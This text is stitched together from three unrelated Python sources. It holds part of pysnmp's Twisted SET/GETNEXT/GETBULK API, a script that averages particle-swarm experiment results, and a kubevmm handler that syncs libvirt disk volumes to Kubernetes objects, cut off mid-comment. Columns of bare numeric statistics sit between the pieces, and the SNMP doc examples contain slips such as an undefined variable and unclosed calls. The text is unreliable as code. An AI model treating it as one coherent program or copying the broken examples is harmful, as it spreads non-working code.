:mod:`twisted` I/O framework at a later point of time.
Parameters
----------
snmpEngine : :class:`~pysnmp.hlapi.SnmpEngine`
Class instance representing SNMP engine.
authData : :class:`~pysnmp.hlapi.CommunityData` or :class:`~pysnmp.hlapi.UsmUserData`
Class instance representing SNMP credentials.
transportTarget : :class:`~pysnmp.hlapi.twisted.UdpTransportTarget` or :class:`~pysnmp.hlapi.twisted.Udp6TransportTarget`
Class instance representing transport type along with SNMP peer address.
contextData : :class:`~pysnmp.hlapi.ContextData`
Class instance representing SNMP ContextEngineId and ContextName values.
\*varBinds : :class:`~pysnmp.smi.rfc1902.ObjectType`
One or more class instances representing MIB variables to place
into SNMP request.
Other Parameters
----------------
\*\*options :
Request options:
* `lookupMib` - load MIB and resolve response MIB variables at
the cost of slightly reduced performance. Default is `True`.
Returns
-------
deferred : :class:`~twisted.internet.defer.Deferred`
Twisted Deferred object representing work-in-progress. User
is expected to attach his own `success` and `error` callback
functions to the Deferred object though
:meth:`~twisted.internet.defer.Deferred.addCallbacks` method.
Raises
------
PySnmpError
Or its derivative indicating that an error occurred while
performing SNMP operation.
Notes
-----
User `success` callback is called with the following tuple as
its first argument:
* errorStatus (str) : True value indicates SNMP PDU error.
* errorIndex (int) : Non-zero value refers to `varBinds[errorIndex-1]`
* varBinds (tuple) : A sequence of
:class:`~pysnmp.smi.rfc1902.ObjectType` class instances representing
MIB variables returned in SNMP response.
User `error` callback is called with `errorIndication` object wrapped
in :class:`~twisted.python.failure.Failure` object.
Examples
--------
>>> from twisted.internet.task import react
>>> from pysnmp.hlapi.twisted import *
>>>
>>> def success(args):
... (errorStatus, errorIndex, varBinds) = args
... print(errorStatus, errorIndex, varBind)
...
>>> def failure(errorIndication):
... print(errorIndication)
...
>>> def run(reactor):
... d = setCmd(SnmpEngine(),
... CommunityData('public'),
... UdpTransportTarget(('demo.snmplabs.com', 161)),
... ContextData(),
... ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0), 'Linux i386')
... d.addCallback(success).addErrback(failure)
... return d
...
>>> react(run)
(0, 0, [ObjectType(ObjectIdentity(ObjectName('1.3.6.1.2.1.1.1.0')), DisplayString('Linux i386'))])
>>>
"""
def __cbFun(snmpEngine, sendRequestHandle,
errorIndication, errorStatus, errorIndex,
varBinds, cbCtx):
lookupMib, deferred = cbCtx
if errorIndication:
deferred.errback(Failure(errorIndication))
else:
try:
varBindsUnmade = vbProcessor.unmakeVarBinds(snmpEngine, varBinds, lookupMib)
except Exception:
ex = sys.exc_info()[1]
deferred.errback(Failure(ex))
else:
deferred.callback((errorStatus, errorIndex, varBindsUnmade))
addrName, paramsName = lcd.configure(
snmpEngine, authData, transportTarget, contextData.contextName)
deferred = Deferred()
cmdgen.SetCommandGenerator().sendVarBinds(
snmpEngine, addrName, contextData.contextEngineId,
contextData.contextName,
vbProcessor.makeVarBinds(snmpEngine, varBinds), __cbFun,
(options.get('lookupMib', True), deferred)
)
return deferred
def nextCmd(snmpEngine, authData, transportTarget, contextData,
*varBinds, **options):
"""Performs SNMP GETNEXT query.
Based on passed parameters, prepares SNMP GETNEXT packet
(:RFC:`1905#section-4.2.2`) and schedules its transmission by
:mod:`twisted` I/O framework at a later point of time.
Parameters
----------
snmpEngine : :class:`~pysnmp.hlapi.SnmpEngine`
Class instance representing SNMP engine.
authData : :class:`~pysnmp.hlapi.CommunityData` or :class:`~pysnmp.hlapi.UsmUserData`
Class instance representing SNMP credentials.
transportTarget : :class:`~pysnmp.hlapi.twisted.UdpTransportTarget` or :class:`~pysnmp.hlapi.twisted.Udp6TransportTarget`
Class instance representing transport type along with SNMP peer address.
contextData : :class:`~pysnmp.hlapi.ContextData`
Class instance representing SNMP ContextEngineId and ContextName values.
\*varBinds : :class:`~pysnmp.smi.rfc1902.ObjectType`
One or more class instances representing MIB variables to place
into SNMP request.
Other Parameters
----------------
\*\*options :
Request options:
* `lookupMib` - load MIB and resolve response MIB variables at
the cost of slightly reduced performance. Default is `True`.
* `ignoreNonIncreasingOid` - continue iteration even if response
MIB variables (OIDs) are not greater then request MIB variables.
Be aware that setting it to `True` may cause infinite loop between
SNMP management and agent applications. Default is `False`.
Returns
-------
deferred : :class:`~twisted.internet.defer.Deferred`
Twisted Deferred object representing work-in-progress. User
is expected to attach his own `success` and `error` callback
functions to the Deferred object though
:meth:`~twisted.internet.defer.Deferred.addCallbacks` method.
Raises
------
PySnmpError
Or its derivative indicating that an error occurred while
performing SNMP operation.
Notes
-----
User `success` callback is called with the following tuple as
its first argument:
* errorStatus (str) : True value indicates SNMP PDU error.
* errorIndex (int) : Non-zero value refers to `varBinds[errorIndex-1]`
* varBinds (tuple) :
A sequence of sequences (e.g. 2-D array) of
:py:class:`~pysnmp.smi.rfc1902.ObjectType` class instances
representing a table of MIB variables returned in SNMP response.
Inner sequences represent table rows and ordered exactly the same
as `varBinds` in request. Response to GETNEXT always contain
a single row.
User `error` callback is called with `errorIndication` object wrapped
in :class:`~twisted.python.failure.Failure` object.
Examples
--------
>>> from twisted.internet.task import react
>>> from pysnmp.hlapi.twisted import *
>>>
>>> def success(args):
... (errorStatus, errorIndex, varBindTable) = args
... print(errorStatus, errorIndex, varBindTable)
...
>>> def failure(errorIndication):
... print(errorIndication)
...
>>> def run(reactor):
... d = nextCmd(SnmpEngine(),
... CommunityData('public'),
... UdpTransportTarget(('demo.snmplabs.com', 161)),
... ContextData(),
... ObjectType(ObjectIdentity('SNMPv2-MIB', 'system'))
... d.addCallback(success).addErrback(failure)
... return d
...
>>> react(run)
(0, 0, [[ObjectType(ObjectIdentity(ObjectName('1.3.6.1.2.1.1.1.0')), DisplayString('SunOS zeus.snmplabs.com 4.1.3_U1 1 sun4m'))]])
>>>
"""
def __cbFun(snmpEngine, sendRequestHandle,
errorIndication, errorStatus, errorIndex,
varBindTable, cbCtx):
lookupMib, deferred = cbCtx
if (options.get('ignoreNonIncreasingOid', False) and
errorIndication and isinstance(errorIndication, errind.OidNotIncreasing)):
errorIndication = None
if errorIndication:
deferred.errback(Failure(errorIndication))
else:
try:
varBindsUnmade = [vbProcessor.unmakeVarBinds(snmpEngine,
varBindTableRow,
lookupMib)
for varBindTableRow in varBindTable]
except Exception:
ex = sys.exc_info()[1]
deferred.errback(Failure(ex))
else:
deferred.callback((errorStatus, errorIndex, varBindsUnmade))
addrName, paramsName = lcd.configure(
snmpEngine, authData, transportTarget, contextData.contextName)
deferred = Deferred()
cmdgen.NextCommandGenerator().sendVarBinds(
snmpEngine, addrName, contextData.contextEngineId,
contextData.contextName,
vbProcessor.makeVarBinds(snmpEngine, varBinds), __cbFun,
(options.get('lookupMib', True), deferred)
)
return deferred
def bulkCmd(snmpEngine, authData, transportTarget, contextData,
nonRepeaters, maxRepetitions, *varBinds, **options):
"""Performs SNMP GETBULK query.
Based on passed parameters, prepares SNMP GETNEXT packet
(:RFC:`1905#section-4.2.3`) and schedules its transmission by
:mod:`twisted` I/O framework at a later point of time.
Parameters
----------
snmpEngine : :class:`~pysnmp.hlapi.SnmpEngine`
Class instance representing SNMP engine.
authData : :class:`~pysnmp.hlapi.CommunityData` or :class:`~pysnmp.hlapi.UsmUserData`
Class instance representing SNMP credentials.
transportTarget : :class:`~pysnmp.hlapi.twisted.UdpTransportTarget` or :class:`~pysnmp.hlapi.twisted.Udp6TransportTarget`
Class instance representing transport type along with SNMP peer address.
contextData : :class:`~pysnmp.hlapi.ContextData`
Class instance representing SNMP ContextEngineId and ContextName values.
nonRepeaters : int
One MIB variable is requested in response for the first
`nonRepeaters` MIB variables in request.
maxRepetitions : int
`maxRepetitions` MIB variables are requested in response for each
of the remaining MIB variables in the request (e.g. excluding
`nonRepeaters`). Remote SNMP engine may choose lesser value than
requested.
\*varBinds : :class:`~pysnmp.smi.rfc1902.ObjectType`
One or more class instances representing MIB variables to place
into SNMP request.
Other Parameters
----------------
\*\*options :
Request options:
* `lookupMib` - load MIB and resolve response MIB variables at
the cost of slightly reduced performance. Default is `True`.
* `ignoreNonIncreasingOid` - continue iteration even if response
MIB variables (OIDs) are not greater then request MIB variables.
Be aware that setting it to `True` may cause infinite loop between
SNMP management and agent applications. Default is `False`.
Returns
-------
deferred : :class:`~twisted.internet.defer.Deferred`
Twisted Deferred object representing work-in-progress. User
is expected to attach his own `success` and `error` callback
functions to the Deferred object though
:meth:`~twisted.internet.defer.Deferred.addCallbacks` method.
Raises
------
PySnmpError
Or its derivative indicating that an error occurred while
performing SNMP operation.
Notes
-----
User `success` callback is called with the following tuple as
its first argument:
* errorStatus (str) : True value indicates SNMP PDU error.
* errorIndex (int) : Non-zero value refers to `varBinds[errorIndex-1]`
* varBindTable (tuple):
A sequence of sequences (e.g. 2-D array) of
:py:class:`~pysnmp.smi.rfc1902.ObjectType` class instances representing a
table of MIB variables returned in SNMP response, with up to
``maxRepetitions`` rows, i.e. ``len(varBindTable) <= maxRepetitions``.
For ``0 <= i < len(varBindTable)`` and ``0 <= j < len(varBinds)``,
``varBindTable[i][j]`` represents:
- For non-repeaters (``j < nonRepeaters``), the first lexicographic
successor of ``varBinds[j]``, regardless the value of ``i``, or an
:py:class:`~pysnmp.smi.rfc1902.ObjectType` instance with the
:py:obj:`~pysnmp.proto.rfc1905.endOfMibView` value if no such successor
exists;
- For repeaters (``j >= nonRepeaters``), the ``i``-th lexicographic
successor of ``varBinds[j]``, or an
:py:class:`~pysnmp.smi.rfc1902.ObjectType` instance with the
:py:obj:`~pysnmp.proto.rfc1905.endOfMibView` value if no such successor
exists.
See :rfc:`3416#section-4.2.3` for details on the underlying
``GetBulkRequest-PDU`` and the associated ``GetResponse-PDU``, such as
specific conditions under which the server may truncate the response,
causing ``varBindTable`` to have less than ``maxRepetitions`` rows.
User `error` callback is called with `errorIndication` object wrapped
in :class:`~twisted.python.failure.Failure` object.
Examples
--------
>>> from twisted.internet.task import react
>>> from pysnmp.hlapi.twisted import *
>>>
>>> def success(args):
... (errorStatus, errorIndex, varBindTable) = args
... print(errorStatus, errorIndex, varBindTable)
...
>>> def failure(errorIndication):
... print(errorIndication)
...
>>> def run(reactor):
... d = bulkCmd(SnmpEngine(),
... CommunityData('public'),
... UdpTransportTarget(('demo.snmplabs.com', 161)),
... ContextData(),
... 0, 2,
... ObjectType(ObjectIdentity('SNMPv2-MIB', 'system'))
... d.addCallback(success).addErrback(failure)
... return d
...
>>> react(run)
(0, 0, [[ObjectType(ObjectIdentity(ObjectName('1.3.6.1.2.1.1.1.0')), DisplayString('SunOS zeus.snmplabs.com 4.1.3_U1 1 sun4m'))], [ObjectType(ObjectIdentity(ObjectName('1.3.6.1.2.1.1.2.0')), ObjectIdentifier('1.3.6.1.4.1.424242.1.1'))]])
>>>
"""
def __cbFun(snmpEngine, sendRequestHandle,
errorIndication, errorStatus, errorIndex,
varBindTable, cbCtx):
lookupMib, deferred = cbCtx
if options.get('ignoreNonIncreasingOid', False) and errorIndication and \
isinstance(errorIndication, errind.OidNotIncreasing):
errorIndication = None
if errorIndication:
deferred.errback(Failure(errorIndication))
else:
try:
varBindsUnmade = [vbProcessor.unmakeVarBinds(snmpEngine,
varBindTableRow,
lookupMib)
for varBindTableRow in varBindTable]
except Exception:
ex = sys.exc_info()[1]
deferred.errback(Failure(ex))
else:
deferred.callback((errorStatus, errorIndex, varBindsUnmade))
addrName, paramsName = lcd.configure(
snmpEngine, authData, transportTarget, contextData.contextName)
deferred = Deferred()
cmdgen.BulkCommandGenerator().sendVarBinds(
snmpEngine, addrName, contextData.contextEngineId,
contextData.contextName, nonRepeaters, maxRepetitions,
vbProcessor.makeVarBinds(snmpEngine, varBinds),
__cbFun,
(options.get('lookupMib', True), deferred)
)
return deferred
| 38.21982
| 241
| 0.637752
| 2,140
| 21,212
| 6.308879
| 0.150935
| 0.027702
| 0.028442
| 0.025776
| 0.871639
| 0.866751
| 0.863492
| 0.851789
| 0.836012
| 0.830383
| 0
| 0.014352
| 0.254337
| 21,212
| 554
| 242
| 38.288809
| 0.839224
| 0.658259
| 0
| 0.734848
| 0
| 0
| 0.019532
| 0.007409
| 0
| 0
| 0
| 0
| 0
| 1
| 0.060606
| false
| 0
| 0.083333
| 0
| 0.174242
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c548b596be5b903e276b1a2a262f293110545231
| 6,765
|
py
|
Python
|
Base_PSO/Visualization/mean_value_second_app.py
|
NuriaValls/PSO-2RW-Applications
|
129b75ec72fcb32bc9bf43c0ad3bf55c44423092
|
[
"MIT"
] | null | null | null |
Base_PSO/Visualization/mean_value_second_app.py
|
NuriaValls/PSO-2RW-Applications
|
129b75ec72fcb32bc9bf43c0ad3bf55c44423092
|
[
"MIT"
] | null | null | null |
Base_PSO/Visualization/mean_value_second_app.py
|
NuriaValls/PSO-2RW-Applications
|
129b75ec72fcb32bc9bf43c0ad3bf55c44423092
|
[
"MIT"
] | null | null | null |
import matplotlib.pyplot as plt
from matplotlib.animation import FuncAnimation
import numpy as np
import math
from scipy.stats import gaussian_kde
file = open('first_approach_data_aux_1.txt')
fit1 = []
ite1 = []
tim1 = []
fit2 = []
ite2 = []
tim2 = []
fit3 = []
ite3 = []
tim3 = []
i = 0
for line in file:
aux = line.rstrip('\n').split(',')
for a in aux:
b = a.split(' ')
if i==0:
fit1.append(float(b[0]))
ite1.append(int(b[1]))
tim1.append(float(b[2]))
i=1
elif i==1:
fit2.append(float(b[0]))
ite2.append(int(b[1]))
tim2.append(float(b[2]))
i = 2
elif i==2:
fit3.append(float(b[0]))
ite3.append(int(b[1]))
tim3.append(float(b[2]))
i = 0
file1 = open('first_approach_data_aux_2.txt')
for line in file1:
aux = line.rstrip('\n').split(',')
for a in aux:
b = a.split(' ')
if i == 0:
fit1.append(float(b[0]))
ite1.append(int(b[1]))
tim1.append(float(b[2]))
i = 1
elif i == 1:
fit2.append(float(b[0]))
ite2.append(int(b[1]))
tim2.append(float(b[2]))
i = 2
elif i == 2:
fit3.append(float(b[0]))
ite3.append(int(b[1]))
tim3.append(float(b[2]))
i = 0
file2 = open('first_approach_data_aux_3.txt')
for line in file2:
aux = line.rstrip('\n').split(',')
for a in aux:
b = a.split(' ')
if i == 0:
fit1.append(float(b[0]))
ite1.append(int(b[1]))
tim1.append(float(b[2]))
i = 1
elif i == 1:
fit2.append(float(b[0]))
ite2.append(int(b[1]))
tim2.append(float(b[2]))
i = 2
elif i == 2:
fit3.append(float(b[0]))
ite3.append(int(b[1]))
tim3.append(float(b[2]))
i = 0
file3 = open('first_approach_data_aux_4.txt')
for line in file3:
aux = line.rstrip('\n').split(',')
for a in aux:
b = a.split(' ')
if i == 0:
fit1.append(float(b[0]))
ite1.append(int(b[1]))
tim1.append(float(b[2]))
i = 1
elif i == 1:
fit2.append(float(b[0]))
ite2.append(int(b[1]))
tim2.append(float(b[2]))
i = 2
elif i == 2:
fit3.append(float(b[0]))
ite3.append(int(b[1]))
tim3.append(float(b[2]))
i = 0
file4 = open('first_approach_data_aux_5.txt')
for line in file4:
aux = line.rstrip('\n').split(',')
for a in aux:
b = a.split(' ')
if i == 0:
fit1.append(float(b[0]))
ite1.append(int(b[1]))
tim1.append(float(b[2]))
i = 1
elif i == 1:
fit2.append(float(b[0]))
ite2.append(int(b[1]))
tim2.append(float(b[2]))
i = 2
elif i == 2:
fit3.append(float(b[0]))
ite3.append(int(b[1]))
tim3.append(float(b[2]))
i = 0
file5 = open('first_approach_data_aux_6.txt')
for line in file5:
aux = line.rstrip('\n').split(',')
for a in aux:
b = a.split(' ')
if i == 0:
fit1.append(float(b[0]))
ite1.append(int(b[1]))
tim1.append(float(b[2]))
i = 1
elif i == 1:
fit2.append(float(b[0]))
ite2.append(int(b[1]))
tim2.append(float(b[2]))
i = 2
elif i == 2:
fit3.append(float(b[0]))
ite3.append(int(b[1]))
tim3.append(float(b[2]))
i = 0
file6 = open('first_approach_data_aux_7.txt')
for line in file6:
aux = line.rstrip('\n').split(',')
for a in aux:
b = a.split(' ')
if i == 0:
fit1.append(float(b[0]))
ite1.append(int(b[1]))
tim1.append(float(b[2]))
i = 1
elif i == 1:
fit2.append(float(b[0]))
ite2.append(int(b[1]))
tim2.append(float(b[2]))
i = 2
elif i == 2:
fit3.append(float(b[0]))
ite3.append(int(b[1]))
tim3.append(float(b[2]))
i = 0
file7 = open('first_approach_data_aux_8.txt')
for line in file7:
aux = line.rstrip('\n').split(',')
for a in aux:
b = a.split(' ')
if i == 0:
fit1.append(float(b[0]))
ite1.append(int(b[1]))
tim1.append(float(b[2]))
i = 1
elif i == 1:
fit2.append(float(b[0]))
ite2.append(int(b[1]))
tim2.append(float(b[2]))
i = 2
elif i == 2:
fit3.append(float(b[0]))
ite3.append(int(b[1]))
tim3.append(float(b[2]))
i = 0
file8 = open('first_approach_data_aux_9.txt')
for line in file8:
aux = line.rstrip('\n').split(',')
for a in aux:
b = a.split(' ')
if i == 0:
fit1.append(float(b[0]))
ite1.append(int(b[1]))
tim1.append(float(b[2]))
i = 1
elif i == 1:
fit2.append(float(b[0]))
ite2.append(int(b[1]))
tim2.append(float(b[2]))
i = 2
elif i == 2:
fit3.append(float(b[0]))
ite3.append(int(b[1]))
tim3.append(float(b[2]))
i = 0
file9 = open('first_approach_data_aux_10.txt')
for line in file9:
aux = line.rstrip('\n').split(',')
for a in aux:
b = a.split(' ')
if i == 0:
fit1.append(float(b[0]))
ite1.append(int(b[1]))
tim1.append(float(b[2]))
i = 1
elif i == 1:
fit2.append(float(b[0]))
ite2.append(int(b[1]))
tim2.append(float(b[2]))
i = 2
elif i == 2:
fit3.append(float(b[0]))
ite3.append(int(b[1]))
tim3.append(float(b[2]))
i = 0
print(len(fit1))
print(sum(fit1)/220)
print(np.std(fit1))
print(sum(ite1)/220)
print(np.std(ite1))
t_i = []
for i in range(0, 220):
t_i.append(tim1[i]/ite1[i])
print(sum(t_i)/220)
print(np.std(t_i))
print('\n')
print(sum(fit2)/220)
print(np.std(fit2))
print(sum(ite2)/220)
print(np.std(ite2))
t_i = []
for i in range(0, 220):
t_i.append(tim2[i]/ite2[i])
print(sum(t_i)/220)
print(np.std(t_i))
print('\n')
print(sum(fit3)/220)
print(np.std(fit3))
print(sum(ite3)/220)
print(np.std(ite3))
t_i = []
for i in range(0, 220):
t_i.append(tim3[i]/ite3[i])
print(sum(t_i)/220)
print(np.std(t_i))
| 23.489583
| 46
| 0.458684
| 1,003
| 6,765
| 3.040877
| 0.071785
| 0.216393
| 0.236066
| 0.127869
| 0.806885
| 0.728197
| 0.728197
| 0.728197
| 0.728197
| 0.728197
| 0
| 0.078317
| 0.363932
| 6,765
| 288
| 47
| 23.489583
| 0.63049
| 0
| 0
| 0.795918
| 0
| 0
| 0.049512
| 0.043009
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.020408
| 0
| 0.020408
| 0.085714
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
c57831f0b68e42c790073293dc9fe0d1603a8963
| 63,142
|
py
|
Python
|
virt/core/virtlet/services/os_event_handler.py
|
kubesys/kubevmm
|
de19303a24e1c1abe4b410732843d4c474f742c5
|
[
"Apache-2.0"
] | 2
|
2021-09-13T07:35:51.000Z
|
2022-01-27T14:42:57.000Z
|
virt/core/virtlet/services/os_event_handler.py
|
kubesys/kube-vmm
|
de19303a24e1c1abe4b410732843d4c474f742c5
|
[
"Apache-2.0"
] | null | null | null |
virt/core/virtlet/services/os_event_handler.py
|
kubesys/kube-vmm
|
de19303a24e1c1abe4b410732843d4c474f742c5
|
[
"Apache-2.0"
] | 2
|
2019-07-15T10:12:18.000Z
|
2019-07-16T07:55:31.000Z
|
# -*- coding: utf-8 -*-
'''
Copyright (2021, ) Institute of Software, Chinese Academy of Sciences
@author: wuyuewen@otcaix.iscas.ac.cn
@author: wuheng@otcaix.iscas.ac.cn
'''
import json
'''
Import python libs
'''
import os
import time
import traceback
import sys
from json import loads
from json import dumps
from xml.etree.ElementTree import fromstring
'''
Import third party libs
'''
from watchdog.observers import Observer
from watchdog.events import *
from kubernetes import client, config
from kubernetes.client.rest import ApiException
from kubernetes.client import V1DeleteOptions
from xmljson import badgerfish as bf
'''
Import local libs
'''
from utils.libvirt_util import get_pool_path, get_volume_path, refresh_pool, get_volume_xml, get_snapshot_xml, is_vm_exists, get_xml, \
vm_state, _get_all_pool_path, get_vol_info_by_qemu
from utils import logger
from utils import constants
from utils.misc import create_custom_object, delete_custom_object, get_custom_object, update_custom_object, add_spec_in_volume, updateDescription, addSnapshots, get_volume_snapshots, runCmdRaiseException, \
addPowerStatusMessage, updateDomainSnapshot, updateDomain, report_failure, get_hostname_in_lower_case, \
DiskImageHelper
GROUP = constants.KUBERNETES_GROUP
VERSION = constants.KUBERNETES_API_VERSION
VM_KIND = constants.KUBERNETES_KIND_VM
VMD_KIND = constants.KUBERNETES_KIND_VMD
VMDSN_KIND = constants.KUBERNETES_KIND_VMDSN
VMDI_KIND = constants.KUBERNETES_KIND_VMDI
VMSN_KIND = constants.KUBERNETES_KIND_VMSN
VMDEV_KIND = constants.KUBERNETES_KIND_VMDEV
VMI_KIND = constants.KUBERNETES_KIND_VMI
TOKEN = constants.KUBERNETES_TOKEN_FILE
PLURAL_VM = constants.KUBERNETES_PLURAL_VM
PLURAL_VM_DISK = constants.KUBERNETES_PLURAL_VMD
PLURAL_VM_DISK_SS = constants.KUBERNETES_PLURAL_VMDSN
PLURAL_VM_DISK_IMAGE = constants.KUBERNETES_PLURAL_VMDI
LIBVIRT_XML_DIR = constants.KUBEVMM_LIBVIRT_VM_XML_DIR
VMD_TEMPLATE_DIR = constants.KUBEVMM_DEFAULT_VMDI_DIR
HOSTNAME = get_hostname_in_lower_case()
logger = logger.set_logger(os.path.basename(__file__), constants.KUBEVMM_VIRTLET_LOG)
def xmlToJson(xmlStr):
return dumps(bf.data(fromstring(xmlStr)), sort_keys=True, indent=4)
def toKubeJson(json):
return json.replace('@', '_').replace('$', 'text').replace(
'interface', '_interface').replace('transient', '_transient').replace(
'nested-hv', 'nested_hv').replace('suspend-to-mem', 'suspend_to_mem').replace('suspend-to-disk',
'suspend_to_disk')
def updateJsonRemoveLifecycle(jsondict, body):
if jsondict:
spec = jsondict['spec']
if spec:
lifecycle = spec.get('lifecycle')
if lifecycle:
del spec['lifecycle']
spec.update(body)
return jsondict
def myVmVolEventHandler(event, pool, name, group, version, plural):
# print(jsondict)
if event == "Delete":
try:
refresh_pool(pool)
jsondict = get_custom_object(group, version, plural, name)
# vol_xml = get_volume_xml(pool, name)
# vol_json = toKubeJson(xmlToJson(vol_xml))
jsondict = updateJsonRemoveLifecycle(jsondict, {})
body = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
update_custom_object(group, version, plural, name, body)
except ApiException as e:
if e.reason == 'Not Found':
logger.debug('**VM disk %s already deleted, ignore this 404 error.' % name)
else:
info = sys.exc_info()
try:
report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
except:
logger.warning('Oops! ', exc_info=1)
except:
logger.error('Oops! ', exc_info=1)
info = sys.exc_info()
try:
report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
except:
logger.warning('Oops! ', exc_info=1)
try:
logger.debug('Delete vm disk %s, report to virtlet' % name)
delete_custom_object(group, version, plural, name)
except ApiException as e:
if e.reason == 'Not Found':
logger.debug('**VM disk %s already deleted, ignore this 404 error.' % name)
else:
info = sys.exc_info()
try:
report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
except:
logger.warning('Oops! ', exc_info=1)
except:
logger.error('Oops! ', exc_info=1)
info = sys.exc_info()
try:
report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
except:
logger.warning('Oops! ', exc_info=1)
elif event == "Create":
try:
logger.debug('Create vm disk %s, report to virtlet' % name)
jsondict = {'spec': {'volume': {}, 'nodeName': HOSTNAME, 'status': {}},
'kind': VMD_KIND, 'metadata': {'labels': {'host': HOSTNAME}, 'name': name},
'apiVersion': '%s/%s' % (group, version)}
with open(get_pool_path(pool) + '/' + name + '/config.json', "r") as f:
config = json.load(f)
volume = get_vol_info_by_qemu(config['current'])
volume["pool"] = config['pool']
volume["poolname"] = pool
volume["uni"] = config['current']
volume['disk'] = name
volume['current'] = config['current']
vol_json = {'volume': volume}
vol_json = add_spec_in_volume(vol_json, 'current', config['current'])
jsondict = updateJsonRemoveLifecycle(jsondict, vol_json)
body = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
try:
create_custom_object(group, version, plural, body)
except ApiException as e:
logger.error(e)
except:
logger.error('Oops! ', exc_info=1)
info = sys.exc_info()
try:
jsondict = get_custom_object(group, version, plural, name)
report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
except:
logger.error('Oops! ', exc_info=1)
elif event == "Modify":
try:
logger.debug('Modify vm disk %s current, report to virtlet' % name)
jsondict = get_custom_object(group, version, plural, name)
with open(get_pool_path(pool) + '/' + name + '/config.json', "r") as f:
config = json.load(f)
volume = get_vol_info_by_qemu(config['current'])
volume["pool"] = config['pool']
volume["poolname"] = pool
volume["uni"] = config['current']
volume['disk'] = name
volume['current'] = config['current']
vol_json = {'volume': volume}
logger.debug(config['current'])
vol_json = add_spec_in_volume(vol_json, 'current', config['current'])
jsondict = updateJsonRemoveLifecycle(jsondict, vol_json)
body = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
try:
update_custom_object(group, version, plural, name, body)
except ApiException as e:
logger.error(e)
except:
logger.error('Oops! ', exc_info=1)
info = sys.exc_info()
try:
jsondict = get_custom_object(group, version, plural, name)
report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
except:
logger.error('Oops! ', exc_info=1)
else:
refresh_pool(pool)
jsondict = get_custom_object(group, version, plural, name)
try:
pass
except:
logger.error('Oops! ', exc_info=1)
info = sys.exc_info()
try:
report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
except:
logger.warning('Oops! ', exc_info=1)
# def myVmVolSnapshotEventHandler(event, pool, ss_path, name, group, version, plural):
# # print(jsondict)
# if event == "Delete":
# try:
# refresh_pool(pool)
# jsondict = client.CustomObjectsApi().get_namespaced_custom_object(group=group,
# version=version,
# namespace='default',
# plural=plural,
# name=name)
# # vol_xml = get_volume_xml(pool, name)
# # vol_json = toKubeJson(xmlToJson(vol_xml))
# jsondict = updateJsonRemoveLifecycle(jsondict, {})
# body = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
# modifyStructure(name, body, group, version, plural)
# except ApiException as e:
# if e.reason == 'Not Found':
# logger.debug('**VM disk %s already deleted, ignore this 404 error.' % name)
# else:
# info = sys.exc_info()
# try:
# report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
# except:
# logger.warning('Oops! ', exc_info=1)
# except:
# logger.error('Oops! ', exc_info=1)
# info = sys.exc_info()
# try:
# report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
# except:
# logger.warning('Oops! ', exc_info=1)
# try:
# logger.debug('Delete vm disk snapshot %s, report to virtlet' % name)
# deleteStructure(name, V1DeleteOptions(), group, version, plural)
# except ApiException as e:
# if e.reason == 'Not Found':
# logger.debug('**VM disk snapshot %s already deleted, ignore this 404 error.' % name)
# else:
# info = sys.exc_info()
# try:
# report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
# except:
# logger.warning('Oops! ', exc_info=1)
# except:
# logger.error('Oops! ', exc_info=1)
# info = sys.exc_info()
# try:
# report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
# except:
# logger.warning('Oops! ', exc_info=1)
# elif event == "Create":
# try:
# logger.debug('Create vm disk snapshot %s, report to virtlet' % name)
# jsondict = {'spec': {'volume': {}, 'nodeName': HOSTNAME, 'status': {}},
# 'kind': VMDSN_KIND, 'metadata': {'labels': {'host': HOSTNAME}, 'name': name},
# 'apiVersion': '%s/%s' % (group, version)}
#
# volume = get_vol_info_by_qemu(ss_path)
# volume["poolname"] = pool
# volume["uni"] = ss_path
# volume['disk'] = name
# volume['current'] = ss_path
# vol_json = {'volume': volume}
# current = DiskImageHelper.get_backing_file(ss_path)
# vol_json = add_spec_in_volume(vol_json, 'current', current)
# jsondict = updateJsonRemoveLifecycle(jsondict, vol_json)
# body = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
# try:
# createStructure(body, group, version, plural)
# except ApiException as e:
# if e.reason == 'Conflict':
# jsondict = client.CustomObjectsApi().get_namespaced_custom_object(group=group,
# version=version,
# namespace='default',
# plural=plural,
# name=name)
# jsondict = updateJsonRemoveLifecycle(jsondict, vol_json)
# body = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
# modifyStructure(name, body, group, version, plural)
# else:
# logger.error(e)
#
# except:
# logger.error('Oops! ', exc_info=1)
# info = sys.exc_info()
# try:
# jsondict = client.CustomObjectsApi().get_namespaced_custom_object(group=group,
# version=version,
# namespace='default',
# plural=plural,
# name=name)
# report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
# except:
# logger.error('Oops! ', exc_info=1)
# elif event == "Modify":
# try:
# logger.debug('Modify vm disk snapshot %s current, report to virtlet' % name)
